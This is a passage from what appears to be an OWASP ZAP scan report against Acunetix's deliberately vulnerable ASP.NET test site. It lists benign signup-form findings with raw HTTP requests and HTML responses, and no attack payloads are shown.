<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	POST
Parameter	btnSignup
Attack
Evidence
Show / hide Request and Response
Request Header - size: 407 bytes.	POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Signup.aspx Content-Length: 1060 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,060 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc%2BmKdRBm3AUE&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13329
Response Body - size: 13,329 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBBsKql/xMtNSXxlEXNG8K/C7XIc2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> <span id="lblStatus">Subscription successfull. Please visit the login page to login.</span> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	POST
Parameter	tbPassword
Attack
Evidence
Show / hide Request and Response
Request Header - size: 407 bytes.	POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Signup.aspx Content-Length: 1060 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,060 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc%2BmKdRBm3AUE&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13329
Response Body - size: 13,329 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBBsKql/xMtNSXxlEXNG8K/C7XIc2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" 